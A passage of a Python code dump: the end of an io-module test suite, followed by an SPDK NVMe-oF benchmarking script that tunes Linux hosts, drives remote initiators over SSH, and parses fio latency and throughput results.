tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
run_nvmf.py
|
#!/usr/bin/env python3
import os
import re
import sys
import json
import zipfile
import threading
import subprocess
import itertools
import configparser
import time
import uuid
from collections import OrderedDict
import paramiko
import pandas as pd
import rpc
import rpc.client
from common import *
class Server:
def __init__(self, name, general_config, server_config):
self.name = name
self.username = general_config["username"]
self.password = general_config["password"]
self.transport = general_config["transport"].lower()
self.nic_ips = server_config["nic_ips"]
self.mode = server_config["mode"]
self.irq_scripts_dir = "/usr/src/local/mlnx-tools/ofed_scripts"
if "irq_scripts_dir" in server_config and server_config["irq_scripts_dir"]:
self.irq_scripts_dir = server_config["irq_scripts_dir"]
self.local_nic_info = []
self._nics_json_obj = {}
self.svc_restore_dict = {}
self.sysctl_restore_dict = {}
self.tuned_restore_dict = {}
self.governor_restore = ""
self.tuned_profile = ""
self.enable_adq = False
self.adq_priority = None
if "adq_enable" in server_config and server_config["adq_enable"]:
self.enable_adq = server_config["adq_enable"]
self.adq_priority = 1
if "tuned_profile" in server_config:
self.tuned_profile = server_config["tuned_profile"]
if not re.match("^[A-Za-z0-9]*$", name):
self.log_print("Please use a name which contains only letters or numbers")
sys.exit(1)
def log_print(self, msg):
print("[%s] %s" % (self.name, msg), flush=True)
def get_uncommented_lines(self, lines):
return [line for line in lines if line and not line.startswith('#')]
def get_nic_name_by_ip(self, ip):
if not self._nics_json_obj:
nics_json_obj = self.exec_cmd(["ip", "-j", "address", "show"])
self._nics_json_obj = list(filter(lambda x: x["addr_info"], json.loads(nics_json_obj)))
for nic in self._nics_json_obj:
for addr in nic["addr_info"]:
if ip in addr["local"]:
return nic["ifname"]
def set_local_nic_info_helper(self):
pass
def set_local_nic_info(self, pci_info):
def extract_network_elements(json_obj):
nic_list = []
if isinstance(json_obj, list):
for x in json_obj:
nic_list.extend(extract_network_elements(x))
elif isinstance(json_obj, dict):
if "children" in json_obj:
nic_list.extend(extract_network_elements(json_obj["children"]))
if "class" in json_obj.keys() and "network" in json_obj["class"]:
nic_list.append(json_obj)
return nic_list
self.local_nic_info = extract_network_elements(pci_info)
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
return ""
def configure_system(self):
self.configure_services()
self.configure_sysctl()
self.configure_tuned()
self.configure_cpu_governor()
self.configure_irq_affinity()
def configure_adq(self):
if self.mode == "kernel":
self.log_print("WARNING: ADQ setup not yet supported for Kernel mode. Skipping configuration.")
return
self.adq_load_modules()
self.adq_configure_nic()
def adq_load_modules(self):
self.log_print("Modprobing ADQ-related Linux modules...")
adq_module_deps = ["sch_mqprio", "act_mirred", "cls_flower"]
for module in adq_module_deps:
try:
self.exec_cmd(["sudo", "modprobe", module])
self.log_print("%s loaded!" % module)
except CalledProcessError as e:
self.log_print("ERROR: failed to load module %s" % module)
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
def adq_configure_tc(self):
self.log_print("Configuring ADQ Traffic classess and filters...")
if self.mode == "kernel":
self.log_print("WARNING: ADQ setup not yet supported for Kernel mode. Skipping configuration.")
return
num_queues_tc0 = 2 # 2 is minimum number of queues for TC0
num_queues_tc1 = self.num_cores
port_param = "dst_port" if isinstance(self, Target) else "src_port"
ports = set([p[0] for p in self.subsystem_info_list])
xps_script_path = os.path.join(self.spdk_dir, "scripts", "perf", "nvmf", "set_xps_rxqs")
for nic_ip in self.nic_ips:
nic_name = self.get_nic_name_by_ip(nic_ip)
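            # mqprio splits the NIC queues into two traffic classes: TC0 keeps a couple of
            # queues for regular traffic, TC1 gets one queue per core for the NVMe-oF
            # connections matched by the flower filters added below.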
tc_qdisc_map_cmd = ["sudo", "tc", "qdisc", "add", "dev", nic_name,
"root", "mqprio", "num_tc", "2", "map", "0", "1",
"queues", "%s@0" % num_queues_tc0,
"%s@%s" % (num_queues_tc1, num_queues_tc0),
"hw", "1", "mode", "channel"]
self.log_print(" ".join(tc_qdisc_map_cmd))
self.exec_cmd(tc_qdisc_map_cmd)
tc_qdisc_ingress_cmd = ["sudo", "tc", "qdisc", "add", "dev", nic_name, "ingress"]
self.log_print(" ".join(tc_qdisc_ingress_cmd))
self.exec_cmd(tc_qdisc_ingress_cmd)
for port in ports:
tc_filter_cmd = ["sudo", "tc", "filter", "add", "dev", nic_name,
"protocol", "ip", "ingress", "prio", "1", "flower",
"dst_ip", "%s/32" % nic_ip, "ip_proto", "tcp", port_param, port,
"skip_sw", "hw_tc", "1"]
self.log_print(" ".join(tc_filter_cmd))
self.exec_cmd(tc_filter_cmd)
            # Ethtool coalesce settings must be applied after configuring traffic classes
self.exec_cmd(["sudo", "ethtool", "--coalesce", nic_name, "adaptive-rx", "off", "rx-usecs", "0"])
self.exec_cmd(["sudo", "ethtool", "--coalesce", nic_name, "adaptive-tx", "off", "tx-usecs", "500"])
self.log_print("Running set_xps_rxqs script for %s NIC..." % nic_name)
xps_cmd = ["sudo", xps_script_path, nic_name]
self.log_print(xps_cmd)
self.exec_cmd(xps_cmd)
def adq_configure_nic(self):
self.log_print("Configuring NIC port settings for ADQ testing...")
# Reload the driver first, to make sure any previous settings are re-set.
try:
self.exec_cmd(["sudo", "rmmod", "ice"])
self.exec_cmd(["sudo", "modprobe", "ice"])
except CalledProcessError as e:
self.log_print("ERROR: failed to reload ice module!")
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
nic_names = [self.get_nic_name_by_ip(n) for n in self.nic_ips]
for nic in nic_names:
self.log_print(nic)
try:
self.exec_cmd(["sudo", "ethtool", "-K", nic,
"hw-tc-offload", "on"]) # Enable hardware TC offload
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic,
"channel-inline-flow-director", "on"]) # Enable Intel Flow Director
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic, "fw-lldp-agent", "off"]) # Disable LLDP
self.exec_cmd(["sudo", "ethtool", "--set-priv-flags", nic,
"channel-pkt-inspect-optimize", "off"]) # Disable channel packet inspection optimization
except CalledProcessError as e:
self.log_print("ERROR: failed to configure NIC port using ethtool!")
self.log_print("%s resulted in error: %s" % (e.cmd, e.output))
self.log_print("Please update your NIC driver and firmware versions and try again.")
self.log_print(self.exec_cmd(["sudo", "ethtool", "-k", nic]))
self.log_print(self.exec_cmd(["sudo", "ethtool", "--show-priv-flags", nic]))
def configure_services(self):
self.log_print("Configuring active services...")
svc_config = configparser.ConfigParser(strict=False)
# Below list is valid only for RHEL / Fedora systems and might not
# contain valid names for other distributions.
svc_target_state = {
"firewalld": "inactive",
"irqbalance": "inactive",
"lldpad.service": "inactive",
"lldpad.socket": "inactive"
}
for service in svc_target_state:
out = self.exec_cmd(["sudo", "systemctl", "show", "--no-page", service])
out = "\n".join(["[%s]" % service, out])
svc_config.read_string(out)
if "LoadError" in svc_config[service] and "not found" in svc_config[service]["LoadError"]:
continue
service_state = svc_config[service]["ActiveState"]
self.log_print("Current state of %s service is %s" % (service, service_state))
self.svc_restore_dict.update({service: service_state})
if service_state != "inactive":
self.log_print("Disabling %s. It will be restored after the test has finished." % service)
self.exec_cmd(["sudo", "systemctl", "stop", service])
def configure_sysctl(self):
self.log_print("Tuning sysctl settings...")
busy_read = 0
if self.enable_adq and self.mode == "spdk":
busy_read = 1
sysctl_opts = {
"net.core.busy_poll": 0,
"net.core.busy_read": busy_read,
"net.core.somaxconn": 4096,
"net.core.netdev_max_backlog": 8192,
"net.ipv4.tcp_max_syn_backlog": 16384,
"net.core.rmem_max": 268435456,
"net.core.wmem_max": 268435456,
"net.ipv4.tcp_mem": "268435456 268435456 268435456",
"net.ipv4.tcp_rmem": "8192 1048576 33554432",
"net.ipv4.tcp_wmem": "8192 1048576 33554432",
"net.ipv4.route.flush": 1,
"vm.overcommit_memory": 1,
}
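        # Remember the current value of every option so restore_sysctl() can roll the
        # system back after the test run.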
for opt, value in sysctl_opts.items():
self.sysctl_restore_dict.update({opt: self.exec_cmd(["sysctl", "-n", opt]).strip()})
self.log_print(self.exec_cmd(["sudo", "sysctl", "-w", "%s=%s" % (opt, value)]).strip())
def configure_tuned(self):
if not self.tuned_profile:
self.log_print("WARNING: Tuned profile not set in configration file. Skipping configuration.")
return
self.log_print("Configuring tuned-adm profile to %s." % self.tuned_profile)
service = "tuned"
tuned_config = configparser.ConfigParser(strict=False)
out = self.exec_cmd(["sudo", "systemctl", "show", "--no-page", service])
out = "\n".join(["[%s]" % service, out])
tuned_config.read_string(out)
tuned_state = tuned_config[service]["ActiveState"]
self.svc_restore_dict.update({service: tuned_state})
if tuned_state != "inactive":
profile = self.exec_cmd(["cat", "/etc/tuned/active_profile"]).strip()
profile_mode = self.exec_cmd(["cat", "/etc/tuned/profile_mode"]).strip()
self.tuned_restore_dict = {
"profile": profile,
"mode": profile_mode
}
self.exec_cmd(["sudo", "systemctl", "start", service])
self.exec_cmd(["sudo", "tuned-adm", "profile", self.tuned_profile])
self.log_print("Tuned profile set to %s." % self.exec_cmd(["cat", "/etc/tuned/active_profile"]))
def configure_cpu_governor(self):
self.log_print("Setting CPU governor to performance...")
# This assumes that there is the same CPU scaling governor on each CPU
self.governor_restore = self.exec_cmd(["cat", "/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor"]).strip()
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", "performance"])
def configure_irq_affinity(self):
self.log_print("Setting NIC irq affinity for NICs...")
irq_script_path = os.path.join(self.irq_scripts_dir, "set_irq_affinity.sh")
nic_names = [self.get_nic_name_by_ip(n) for n in self.nic_ips]
for nic in nic_names:
irq_cmd = ["sudo", irq_script_path, nic]
self.log_print(irq_cmd)
self.exec_cmd(irq_cmd, change_dir=self.irq_scripts_dir)
def restore_services(self):
self.log_print("Restoring services...")
for service, state in self.svc_restore_dict.items():
cmd = "stop" if state == "inactive" else "start"
self.exec_cmd(["sudo", "systemctl", cmd, service])
def restore_sysctl(self):
self.log_print("Restoring sysctl settings...")
for opt, value in self.sysctl_restore_dict.items():
self.log_print(self.exec_cmd(["sudo", "sysctl", "-w", "%s=%s" % (opt, value)]).strip())
def restore_tuned(self):
self.log_print("Restoring tuned-adm settings...")
if not self.tuned_restore_dict:
return
if self.tuned_restore_dict["mode"] == "auto":
self.exec_cmd(["sudo", "tuned-adm", "auto_profile"])
self.log_print("Reverted tuned-adm to auto_profile.")
else:
self.exec_cmd(["sudo", "tuned-adm", "profile", self.tuned_restore_dict["profile"]])
self.log_print("Reverted tuned-adm to %s profile." % self.tuned_restore_dict["profile"])
def restore_governor(self):
self.log_print("Restoring CPU governor setting...")
if self.governor_restore:
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", self.governor_restore])
self.log_print("Reverted CPU governor to %s." % self.governor_restore)
class Target(Server):
def __init__(self, name, general_config, target_config):
super(Target, self).__init__(name, general_config, target_config)
# Defaults
self.enable_sar = False
self.sar_delay = 0
self.sar_interval = 0
self.sar_count = 0
self.enable_pcm = False
self.pcm_dir = ""
self.pcm_delay = 0
self.pcm_interval = 0
self.pcm_count = 0
self.enable_bandwidth = 0
self.bandwidth_count = 0
self.enable_dpdk_memory = False
self.dpdk_wait_time = 0
self.enable_zcopy = False
self.scheduler_name = "static"
self.null_block = 0
self._nics_json_obj = json.loads(self.exec_cmd(["ip", "-j", "address", "show"]))
self.subsystem_info_list = []
if "null_block_devices" in target_config:
self.null_block = target_config["null_block_devices"]
if "sar_settings" in target_config:
self.enable_sar, self.sar_delay, self.sar_interval, self.sar_count = target_config["sar_settings"]
if "pcm_settings" in target_config:
self.enable_pcm = True
self.pcm_dir, self.pcm_delay, self.pcm_interval, self.pcm_count = target_config["pcm_settings"]
if "enable_bandwidth" in target_config:
self.enable_bandwidth, self.bandwidth_count = target_config["enable_bandwidth"]
if "enable_dpdk_memory" in target_config:
self.enable_dpdk_memory, self.dpdk_wait_time = target_config["enable_dpdk_memory"]
if "scheduler_settings" in target_config:
self.scheduler_name = target_config["scheduler_settings"]
if "zcopy_settings" in target_config:
self.enable_zcopy = target_config["zcopy_settings"]
self.script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
self.spdk_dir = os.path.abspath(os.path.join(self.script_dir, "../../../"))
self.set_local_nic_info(self.set_local_nic_info_helper())
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.zip_spdk_sources(self.spdk_dir, "/tmp/spdk.zip")
self.configure_system()
if self.enable_adq:
self.configure_adq()
self.sys_config()
def set_local_nic_info_helper(self):
return json.loads(self.exec_cmd(["lshw", "-json"]))
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
stderr_opt = None
if stderr_redirect:
stderr_opt = subprocess.STDOUT
if change_dir:
old_cwd = os.getcwd()
os.chdir(change_dir)
self.log_print("Changing directory to %s" % change_dir)
out = check_output(cmd, stderr=stderr_opt).decode(encoding="utf-8")
if change_dir:
os.chdir(old_cwd)
self.log_print("Changing directory to %s" % old_cwd)
return out
def zip_spdk_sources(self, spdk_dir, dest_file):
self.log_print("Zipping SPDK source directory")
fh = zipfile.ZipFile(dest_file, "w", zipfile.ZIP_DEFLATED)
for root, directories, files in os.walk(spdk_dir, followlinks=True):
for file in files:
fh.write(os.path.relpath(os.path.join(root, file)))
fh.close()
self.log_print("Done zipping")
def read_json_stats(self, file):
with open(file, "r") as json_data:
data = json.load(json_data)
        job_pos = 0  # job_pos = 0 because we use fio's aggregated (group_reporting) results
# Check if latency is in nano or microseconds to choose correct dict key
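        # fio suffixes these keys with the unit (e.g. "lat_ns" or "lat_us"), so the helper
        # below returns both the key and the unit string used for the usec conversion.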
def get_lat_unit(key_prefix, dict_section):
# key prefix - lat, clat or slat.
# dict section - portion of json containing latency bucket in question
# Return dict key to access the bucket and unit as string
for k, v in dict_section.items():
if k.startswith(key_prefix):
return k, k.split("_")[1]
def get_clat_percentiles(clat_dict_leaf):
if "percentile" in clat_dict_leaf:
p99_lat = float(clat_dict_leaf["percentile"]["99.000000"])
p99_9_lat = float(clat_dict_leaf["percentile"]["99.900000"])
p99_99_lat = float(clat_dict_leaf["percentile"]["99.990000"])
p99_999_lat = float(clat_dict_leaf["percentile"]["99.999000"])
return [p99_lat, p99_9_lat, p99_99_lat, p99_999_lat]
else:
# Latest fio versions do not provide "percentile" results if no
# measurements were done, so just return zeroes
return [0, 0, 0, 0]
read_iops = float(data["jobs"][job_pos]["read"]["iops"])
read_bw = float(data["jobs"][job_pos]["read"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["read"])
read_avg_lat = float(data["jobs"][job_pos]["read"][lat_key]["mean"])
read_min_lat = float(data["jobs"][job_pos]["read"][lat_key]["min"])
read_max_lat = float(data["jobs"][job_pos]["read"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["read"])
read_p99_lat, read_p99_9_lat, read_p99_99_lat, read_p99_999_lat = get_clat_percentiles(
data["jobs"][job_pos]["read"][clat_key])
if "ns" in lat_unit:
read_avg_lat, read_min_lat, read_max_lat = [x / 1000 for x in [read_avg_lat, read_min_lat, read_max_lat]]
if "ns" in clat_unit:
read_p99_lat = read_p99_lat / 1000
read_p99_9_lat = read_p99_9_lat / 1000
read_p99_99_lat = read_p99_99_lat / 1000
read_p99_999_lat = read_p99_999_lat / 1000
write_iops = float(data["jobs"][job_pos]["write"]["iops"])
write_bw = float(data["jobs"][job_pos]["write"]["bw"])
lat_key, lat_unit = get_lat_unit("lat", data["jobs"][job_pos]["write"])
write_avg_lat = float(data["jobs"][job_pos]["write"][lat_key]["mean"])
write_min_lat = float(data["jobs"][job_pos]["write"][lat_key]["min"])
write_max_lat = float(data["jobs"][job_pos]["write"][lat_key]["max"])
clat_key, clat_unit = get_lat_unit("clat", data["jobs"][job_pos]["write"])
write_p99_lat, write_p99_9_lat, write_p99_99_lat, write_p99_999_lat = get_clat_percentiles(
data["jobs"][job_pos]["write"][clat_key])
if "ns" in lat_unit:
write_avg_lat, write_min_lat, write_max_lat = [x / 1000 for x in [write_avg_lat, write_min_lat, write_max_lat]]
if "ns" in clat_unit:
write_p99_lat = write_p99_lat / 1000
write_p99_9_lat = write_p99_9_lat / 1000
write_p99_99_lat = write_p99_99_lat / 1000
write_p99_999_lat = write_p99_999_lat / 1000
return [read_iops, read_bw, read_avg_lat, read_min_lat, read_max_lat,
read_p99_lat, read_p99_9_lat, read_p99_99_lat, read_p99_999_lat,
write_iops, write_bw, write_avg_lat, write_min_lat, write_max_lat,
write_p99_lat, write_p99_9_lat, write_p99_99_lat, write_p99_999_lat]
def parse_results(self, results_dir, initiator_count=None, run_num=None):
files = os.listdir(results_dir)
fio_files = filter(lambda x: ".fio" in x, files)
json_files = [x for x in files if ".json" in x]
headers = ["read_iops", "read_bw", "read_avg_lat_us", "read_min_lat_us", "read_max_lat_us",
"read_p99_lat_us", "read_p99.9_lat_us", "read_p99.99_lat_us", "read_p99.999_lat_us",
"write_iops", "write_bw", "write_avg_lat_us", "write_min_lat_us", "write_max_lat_us",
"write_p99_lat_us", "write_p99.9_lat_us", "write_p99.99_lat_us", "write_p99.999_lat_us"]
aggr_headers = ["iops", "bw", "avg_lat_us", "min_lat_us", "max_lat_us",
"p99_lat_us", "p99.9_lat_us", "p99.99_lat_us", "p99.999_lat_us"]
header_line = ",".join(["Name", *headers])
aggr_header_line = ",".join(["Name", *aggr_headers])
# Create empty results file
csv_file = "nvmf_results.csv"
with open(os.path.join(results_dir, csv_file), "w") as fh:
fh.write(aggr_header_line + "\n")
rows = set()
for fio_config in fio_files:
self.log_print("Getting FIO stats for %s" % fio_config)
job_name, _ = os.path.splitext(fio_config)
# Look in the filename for rwmixread value. Function arguments do
# not have that information.
# TODO: Improve this function by directly using workload params instead
# of regexing through filenames.
if "read" in job_name:
rw_mixread = 1
elif "write" in job_name:
rw_mixread = 0
else:
rw_mixread = float(re.search(r"m_(\d+)", job_name).group(1)) / 100
# If "_CPU" exists in name - ignore it
            # Initiators for the same job could have a different num_cores parameter
job_name = re.sub(r"_\d+CPU", "", job_name)
job_result_files = [x for x in json_files if job_name in x]
self.log_print("Matching result files for current fio config:")
for j in job_result_files:
self.log_print("\t %s" % j)
# There may have been more than 1 initiator used in test, need to check that
# Result files are created so that string after last "_" separator is server name
inits_names = set([os.path.splitext(x)[0].split("_")[-1] for x in job_result_files])
inits_avg_results = []
for i in inits_names:
self.log_print("\tGetting stats for initiator %s" % i)
# There may have been more than 1 test run for this job, calculate average results for initiator
i_results = [x for x in job_result_files if i in x]
i_results_filename = re.sub(r"run_\d+_", "", i_results[0].replace("json", "csv"))
separate_stats = []
for r in i_results:
stats = self.read_json_stats(os.path.join(results_dir, r))
separate_stats.append(stats)
self.log_print(stats)
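                # Average the per-run stat vectors element-wise: zip(*...) transposes
                # runs x metrics, sum() adds each metric across runs, then divide by run count.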
init_results = [sum(x) for x in zip(*separate_stats)]
init_results = [x / len(separate_stats) for x in init_results]
inits_avg_results.append(init_results)
self.log_print("\tAverage results for initiator %s" % i)
self.log_print(init_results)
with open(os.path.join(results_dir, i_results_filename), "w") as fh:
fh.write(header_line + "\n")
fh.write(",".join([job_name, *["{0:.3f}".format(x) for x in init_results]]) + "\n")
# Sum results of all initiators running this FIO job.
            # Latency results are an average of latencies from across all initiators.
inits_avg_results = [sum(x) for x in zip(*inits_avg_results)]
inits_avg_results = OrderedDict(zip(headers, inits_avg_results))
for key in inits_avg_results:
if "lat" in key:
inits_avg_results[key] /= len(inits_names)
# Aggregate separate read/write values into common labels
# Take rw_mixread into consideration for mixed read/write workloads.
aggregate_results = OrderedDict()
for h in aggr_headers:
read_stat, write_stat = [float(value) for key, value in inits_avg_results.items() if h in key]
if "lat" in h:
_ = rw_mixread * read_stat + (1 - rw_mixread) * write_stat
else:
_ = read_stat + write_stat
aggregate_results[h] = "{0:.3f}".format(_)
rows.add(",".join([job_name, *aggregate_results.values()]))
# Save results to file
for row in rows:
with open(os.path.join(results_dir, csv_file), "a") as fh:
fh.write(row + "\n")
self.log_print("You can find the test results in the file %s" % os.path.join(results_dir, csv_file))
def measure_sar(self, results_dir, sar_file_name):
self.log_print("Waiting %d delay before measuring SAR stats" % self.sar_delay)
time.sleep(self.sar_delay)
out = self.exec_cmd(["sar", "-P", "ALL", "%s" % self.sar_interval, "%s" % self.sar_count])
with open(os.path.join(results_dir, sar_file_name), "w") as fh:
for line in out.split("\n"):
if "Average" in line and "CPU" in line:
self.log_print("Summary CPU utilization from SAR:")
self.log_print(line)
if "Average" in line and "all" in line:
self.log_print(line)
fh.write(out)
def measure_pcm_memory(self, results_dir, pcm_file_name):
time.sleep(self.pcm_delay)
cmd = ["%s/pcm-memory.x" % self.pcm_dir, "%s" % self.pcm_interval, "-csv=%s/%s" % (results_dir, pcm_file_name)]
pcm_memory = subprocess.Popen(cmd)
time.sleep(self.pcm_count)
pcm_memory.terminate()
def measure_pcm(self, results_dir, pcm_file_name):
time.sleep(self.pcm_delay)
cmd = ["%s/pcm.x" % self.pcm_dir, "%s" % self.pcm_interval, "-i=%s" % self.pcm_count, "-csv=%s/%s" % (results_dir, pcm_file_name)]
subprocess.run(cmd)
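        # pcm.x writes a CSV with a two-row header; drop the pandas "Unnamed:" placeholders
        # and keep only the columns whose second header row names a UPI link (UPI0-UPI2).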
df = pd.read_csv(os.path.join(results_dir, pcm_file_name), header=[0, 1])
df = df.rename(columns=lambda x: re.sub(r'Unnamed:[\w\s]*$', '', x))
skt = df.loc[:, df.columns.get_level_values(1).isin({'UPI0', 'UPI1', 'UPI2'})]
skt_pcm_file_name = "_".join(["skt", pcm_file_name])
skt.to_csv(os.path.join(results_dir, skt_pcm_file_name), index=False)
def measure_pcm_power(self, results_dir, pcm_power_file_name):
time.sleep(self.pcm_delay)
out = self.exec_cmd(["%s/pcm-power.x" % self.pcm_dir, "%s" % self.pcm_interval, "-i=%s" % self.pcm_count])
with open(os.path.join(results_dir, pcm_power_file_name), "w") as fh:
fh.write(out)
def measure_network_bandwidth(self, results_dir, bandwidth_file_name):
self.log_print("INFO: starting network bandwidth measure")
self.exec_cmd(["bwm-ng", "-o", "csv", "-F", "%s/%s" % (results_dir, bandwidth_file_name),
"-a", "1", "-t", "1000", "-c", str(self.bandwidth_count)])
def measure_dpdk_memory(self, results_dir):
self.log_print("INFO: waiting to generate DPDK memory usage")
time.sleep(self.dpdk_wait_time)
self.log_print("INFO: generating DPDK memory usage")
        # Assumption: the mem stats RPC helper lives in rpc.env_dpdk and needs the target's
        # RPC client; the original bare attribute access was a no-op and dumped nothing.
        rpc.env_dpdk.env_dpdk_get_mem_stats(self.client)
os.rename("/tmp/spdk_mem_dump.txt", "%s/spdk_mem_dump.txt" % (results_dir))
def sys_config(self):
self.log_print("====Kernel release:====")
self.log_print(os.uname().release)
self.log_print("====Kernel command line:====")
with open('/proc/cmdline') as f:
cmdline = f.readlines()
self.log_print('\n'.join(self.get_uncommented_lines(cmdline)))
self.log_print("====sysctl conf:====")
with open('/etc/sysctl.conf') as f:
sysctl = f.readlines()
self.log_print('\n'.join(self.get_uncommented_lines(sysctl)))
self.log_print("====Cpu power info:====")
self.log_print(self.exec_cmd(["cpupower", "frequency-info"]))
self.log_print("====zcopy settings:====")
self.log_print("zcopy enabled: %s" % (self.enable_zcopy))
self.log_print("====Scheduler settings:====")
self.log_print("SPDK scheduler: %s" % (self.scheduler_name))
class Initiator(Server):
def __init__(self, name, general_config, initiator_config):
super(Initiator, self).__init__(name, general_config, initiator_config)
# Required fields
self.ip = initiator_config["ip"]
self.target_nic_ips = initiator_config["target_nic_ips"]
# Defaults
self.cpus_allowed = None
self.cpus_allowed_policy = "shared"
self.spdk_dir = "/tmp/spdk"
self.fio_bin = "/usr/src/fio/fio"
self.nvmecli_bin = "nvme"
self.cpu_frequency = None
self.subsystem_info_list = []
if "spdk_dir" in initiator_config:
self.spdk_dir = initiator_config["spdk_dir"]
if "fio_bin" in initiator_config:
self.fio_bin = initiator_config["fio_bin"]
if "nvmecli_bin" in initiator_config:
self.nvmecli_bin = initiator_config["nvmecli_bin"]
if "cpus_allowed" in initiator_config:
self.cpus_allowed = initiator_config["cpus_allowed"]
if "cpus_allowed_policy" in initiator_config:
self.cpus_allowed_policy = initiator_config["cpus_allowed_policy"]
if "cpu_frequency" in initiator_config:
self.cpu_frequency = initiator_config["cpu_frequency"]
if os.getenv('SPDK_WORKSPACE'):
self.spdk_dir = os.getenv('SPDK_WORKSPACE')
self.ssh_connection = paramiko.SSHClient()
self.ssh_connection.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh_connection.connect(self.ip, username=self.username, password=self.password)
self.exec_cmd(["sudo", "rm", "-rf", "%s/nvmf_perf" % self.spdk_dir])
self.exec_cmd(["mkdir", "-p", "%s" % self.spdk_dir])
self._nics_json_obj = json.loads(self.exec_cmd(["ip", "-j", "address", "show"]))
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.copy_spdk("/tmp/spdk.zip")
self.set_local_nic_info(self.set_local_nic_info_helper())
self.set_cpu_frequency()
self.configure_system()
if self.enable_adq:
self.configure_adq()
self.sys_config()
def set_local_nic_info_helper(self):
return json.loads(self.exec_cmd(["lshw", "-json"]))
def __del__(self):
self.ssh_connection.close()
def exec_cmd(self, cmd, stderr_redirect=False, change_dir=None):
if change_dir:
cmd = ["cd", change_dir, ";", *cmd]
        # In case one of the command elements contains whitespace and is not
        # already quoted (e.g. when calling sysctl), quote it again to prevent
        # expansion when sending it to the remote system.
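        # e.g. "net.ipv4.tcp_rmem=8192 1048576 33554432" has to reach the remote shell
        # as a single argument, not three.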
for i, c in enumerate(cmd):
if (" " in c or "\t" in c) and not (c.startswith("'") and c.endswith("'")):
cmd[i] = '"%s"' % c
cmd = " ".join(cmd)
        # Redirect stderr to stdout by using the get_pty option if needed
_, stdout, _ = self.ssh_connection.exec_command(cmd, get_pty=stderr_redirect)
out = stdout.read().decode(encoding="utf-8")
# Check the return code
rc = stdout.channel.recv_exit_status()
if rc:
raise CalledProcessError(int(rc), cmd, out)
return out
def put_file(self, local, remote_dest):
ftp = self.ssh_connection.open_sftp()
ftp.put(local, remote_dest)
ftp.close()
def get_file(self, remote, local_dest):
ftp = self.ssh_connection.open_sftp()
ftp.get(remote, local_dest)
ftp.close()
def copy_spdk(self, local_spdk_zip):
self.log_print("Copying SPDK sources to initiator %s" % self.name)
self.put_file(local_spdk_zip, "/tmp/spdk_drop.zip")
self.log_print("Copied sources zip from target")
self.exec_cmd(["unzip", "-qo", "/tmp/spdk_drop.zip", "-d", self.spdk_dir])
self.log_print("Sources unpacked")
def copy_result_files(self, dest_dir):
self.log_print("Copying results")
if not os.path.exists(dest_dir):
os.mkdir(dest_dir)
# Get list of result files from initiator and copy them back to target
file_list = self.exec_cmd(["ls", "%s/nvmf_perf" % self.spdk_dir]).strip().split("\n")
for file in file_list:
self.get_file(os.path.join(self.spdk_dir, "nvmf_perf", file),
os.path.join(dest_dir, file))
self.log_print("Done copying results")
def discover_subsystems(self, address_list, subsys_no):
num_nvmes = range(0, subsys_no)
nvme_discover_output = ""
for ip, subsys_no in itertools.product(address_list, num_nvmes):
self.log_print("Trying to discover: %s:%s" % (ip, 4420 + subsys_no))
nvme_discover_cmd = ["sudo",
"%s" % self.nvmecli_bin,
"discover", "-t", "%s" % self.transport,
"-s", "%s" % (4420 + subsys_no),
"-a", "%s" % ip]
try:
stdout = self.exec_cmd(nvme_discover_cmd)
if stdout:
nvme_discover_output = nvme_discover_output + stdout
except CalledProcessError:
                # Do nothing. When discovering remote subsystems of a kernel target
                # we expect "nvme discover" to fail a number of times because we are
                # essentially scanning ports.
pass
subsystems = re.findall(r'trsvcid:\s(\d+)\s+' # get svcid number
r'subnqn:\s+([a-zA-Z0-9\.\-\:]+)\s+' # get NQN id
r'traddr:\s+(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', # get IP address
nvme_discover_output) # from nvme discovery output
subsystems = filter(lambda x: x[-1] in address_list, subsystems)
subsystems = list(set(subsystems))
subsystems.sort(key=lambda x: x[1])
self.log_print("Found matching subsystems on target side:")
for s in subsystems:
self.log_print(s)
self.subsystem_info_list = subsystems
def gen_fio_filename_conf(self, *args, **kwargs):
# Logic implemented in SPDKInitiator and KernelInitiator classes
pass
def gen_fio_config(self, rw, rwmixread, block_size, io_depth, subsys_no, num_jobs=None, ramp_time=0, run_time=10):
fio_conf_template = """
[global]
ioengine={ioengine}
{spdk_conf}
thread=1
group_reporting=1
direct=1
